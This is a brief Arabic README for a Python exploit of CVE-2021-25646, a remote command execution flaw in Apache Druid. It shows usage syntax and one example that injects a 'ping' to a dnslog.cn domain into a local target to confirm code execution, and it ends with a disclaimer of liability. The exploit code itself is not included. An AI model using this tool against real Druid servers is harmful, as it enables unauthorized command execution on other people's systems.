
استغلال بلغة بايثون لثغرة تنفيذ الأوامر عن بُعد CVE-2021-25646 في Apache Druid، مما يتيح حقن الأوامر عبر طلبات HTTP مُصممة خصيصًا.
بواسطة j2ekim
python exp.py -u [--url] -c [--command]
python cve-2021-25646.py -u http://127.0.0.1:8888 -c "ping 5ap7ta.dnslog.cn"

https://www.adminxe.com/2109.html
أي عواقب أو خسائر مباشرة أو غير مباشرة ناتجة عن نشر أو استخدام هذه الأداة تقع على عاتق المستخدم وحده، والمؤلف لا يتحمل أي مسؤولية عن ذلك.